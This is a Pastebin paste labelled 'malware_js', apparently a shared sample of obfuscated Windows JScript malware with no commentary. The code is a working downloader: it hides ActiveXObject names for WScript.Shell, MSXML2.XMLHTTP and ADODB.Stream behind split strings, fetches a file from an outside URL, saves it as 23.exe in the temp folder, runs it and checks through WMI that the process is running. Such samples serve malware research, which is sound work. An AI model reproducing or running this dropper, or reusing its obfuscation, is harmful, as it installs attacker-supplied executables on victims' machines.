API tools faq
paste
Advertisement
opexxx

malware_js

opexxx
Nov 4th, 2016
198
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.18 KB | None | 0 0
raw download clone embed print report
  1. "Wed Oct 5 15:12:00 PDT 2016"
  2. function EONlDaKrDM(dUpprcYC,yrqQYUDWNqvo) {dUpprcYC.Run(yrqQYUDWNqvo, 0x1, 0x0);}
  3. /*mbRZaEZYYPUjhmpYYZvkuHWkWqeQBEFtHCKNoPeoSwZPtbgGqKLIFbykNgGfKDTLWxxUvtdYGvYOAkRIBOVzKPUExpbONVaxfLdvxqWbmPPhzMveHnYKIWjraSpRJHbChtDqrHIyNBBTsHSSFeUozwsxyPxnzNVbcuXEfrophIgZfXjbypLmkqvYOfzdjmJTRPklNvNyuh*/gdHnDZTwUlYlv();
  4. var WRXJN = ["http://masseriacarparelli.it/logs.php"];
  5. var CZUm=965-965;
  6. while(true) {
  7. if(WRXJN.length<=932-932) break;
  8. var cLqH = UpVmDKM() % WRXJN.length;
  9. var CWeynexRp=WRXJN[cLqH];
  10. var QKyBB=UpVmDKM();
  11. var TYXetqZSGF='23.exe';
  12. var mFaYSHk='23.exe';
  13. var hVhghTlZ=104-103;
  14. var RJHwnVTTv = function(){
  15. return new ActiveXObject(bwolf('WS&gLxVGsmNA&cript&gLxVGsmNA&.She&l&l',[0,2,4,5,6],'&'));
  16. }();
  17. var mFaYSHk = TqrGdj(RJHwnVTTv) + String.fromCharCode(92) + mFaYSHk;
  18. var ykhQu = function(){
  19. return new ActiveXObject(bwolf('MSX&nSMiHkhqS&ML2.XM&UHjrbyFdkrV&LHTTP',[0,2,4],'&'));
  20. }();
  21. yHeJ(CWeynexRp,ykhQu);
  22. if (ykhQu.status == 100+100) {
  23. var FaIVtRc = function() {
  24. return new ActiveXObject(bwolf('ADO&DB&AzyYHBFgW&.&tVjrGiBru&Stream',[0,1,3,5],'&'));
  25. }();
  26. var gcBaWrkIyyPS=oVXQc(FaIVtRc,ykhQu.ResponseBody,mFaYSHk);
  27. }
  28. try {
  29. EONlDaKrDM(RJHwnVTTv,mFaYSHk);
  30. var RjOiqRJ = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TYXetqZSGF+'\'');
  31. if ( RjOiqRJ.Count >= 1 ){break;}
  32. } catch(e) {}
  33. CZUm++;
  34. WRXJN.splice (cLqH,684-683);
  35. }
  36. function TqrGdj(gehkZh){var hDDdvMnk=["ExpandEnvironmentStrings"];return gehkZh[hDDdvMnk[0]]('%TMP%')}
  37. function oVXQc(RYPaBXEa,ZyWwH,FcezZGqaIV){try{RYPaBXEa.open();IOLujkIO(RYPaBXEa);VFmZfSR(RYPaBXEa,ZyWwH);uXjaSazLA(RYPaBXEa);MoKX(RYPaBXEa,FcezZGqaIV);YgnGvsTY=RYPaBXEa.size;bcuroUR(RYPaBXEa);return YgnGvsTY;}catch(e){}}
  38. function yHeJ(yxYYoN,iCmbMGj){try{moXy = 'G*STLWRiJVJj*E*T*anqDxqmtlWum'.split('*');iCmbMGj.open(moXy[0]+moXy[2]+moXy[3], yxYYoN, false);iCmbMGj.setRequestHeader("User-Agent", "Python-urllib/3.1");iCmbMGj.send();}catch(e){}}
  39. function bwolf(JSWiaEyv,nwvEPT,SVwTveCUi){xCsZm=JSWiaEyv.split(SVwTveCUi);VjwYYUc = 'ucW';for(rXWJtZvf=0;rXWJtZvf<nwvEPT.length;rXWJtZvf++) {VjwYYUc+=xCsZm[nwvEPT[rXWJtZvf]];}return VjwYYUc.substring(3,VjwYYUc.length);}
  40. function gdHnDZTwUlYlv() {/*rIeIICpxkd().Sleep(2272-156);*/}
  41. function VKZpHFh(){var JJsZBn=["random"];return Math[JJsZBn[0]]()}
  42. function wqrr(qAGWwr) {qAGWwr.open();}
  43. function IOLujkIO(vclddJTss) {vclddJTss.type=1;}
  44. function VFmZfSR(kfEK,LnpYN) {kfEK.write(LnpYN);}
  45. function rIeIICpxkd() {return/*oyWQMeqTVgqSzWvRLsDvpMnJxWwnVnEkTEIfdmieLebMCwLhMimUdEbeKDequxRJreoOoOUJvvFayqVQIrPNKQKTREFONbYDJWOQsJzHY*/WScript;}
  46. function uXjaSazLA(wxFJKi) {var TlOlnxhMXn=[];wxFJKi.position=TlOlnxhMXn.length*(912382-201);}
  47. function MoKX(dXLtdsL,UmEVrAk) {dXLtdsL.saveToFile(UmEVrAk, 2);}
  48. function bcuroUR(Eujpa) {Eujpa.close();}
  49. function UpVmDKM() {var dkHn=100000;var yHdejl = 100;return Math.round(VKZpHFh()*(dkHn-yHdejl)+yHdejl);}
  50. function youPQwRK(CIMOI) {var DPuGlnst='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var lRcwI=0;lRcwI<CIMOI;lRcwI++){LoLhI+=DPuGlnst.charAt(Math.floor(Math.random()*DPuGlnst.length));}return LoLhI;}
  51. function EyLFuCjUuDOErR(YOumLeqeAEqmoS) {return new ActiveXObject(YOumLeqeAEqmoS);}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!